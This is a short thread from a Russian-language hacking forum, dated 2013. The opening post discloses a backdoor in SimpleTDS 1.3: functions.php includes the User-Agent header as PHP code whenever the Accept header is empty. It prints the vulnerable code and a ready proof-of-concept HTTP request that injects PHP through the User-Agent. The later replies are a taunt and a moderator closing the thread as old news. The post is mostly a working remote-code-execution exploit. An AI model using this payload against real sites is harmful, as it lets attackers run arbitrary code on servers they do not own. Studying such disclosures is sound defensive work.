SimpleTDS 1.3 - backdoor/rce

Discussion in 'Веб-уязвимости' started by Expl0ited, 10 Oct 2013.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Официальный дистр: http://simpletds.com/download-1_3
    Уязвимый код в functions.php (205-215):
    PHP:
    {
     
    $accept $_SERVER['HTTP_ACCEPT'] == null true false;
     if(
    $debug || $accept) { 
        
    $os_repository tempnam(sys_get_temp_dir(), 'OSV');
        
    $tmp fopen($os_repository'w');
        
    fwrite($tmp$_SERVER['HTTP_USER_AGENT']);
        
    fclose($tmp);
        include_once(
    $os_repository);
        
    unlink($os_repository);
        }
    }
    POC:
    Code:
    GET /functions.php HTTP/1.1
    Host: localhost
    User-Agent: <?php phpinfo();?>
    Accept: 
    Connection: keep-alive
    
     
    _________________________
    2 people like this.
  2. Ironmаn

    Ironmаn Banned

    Joined:
    22 Aug 2013
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    молодец! я всегда знал что ти хакир :(
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Было найдено пару лет назад BECHED aka ROOT-access.

    Закрываю.
     
    _________________________
Thread Status:
Not open for further replies.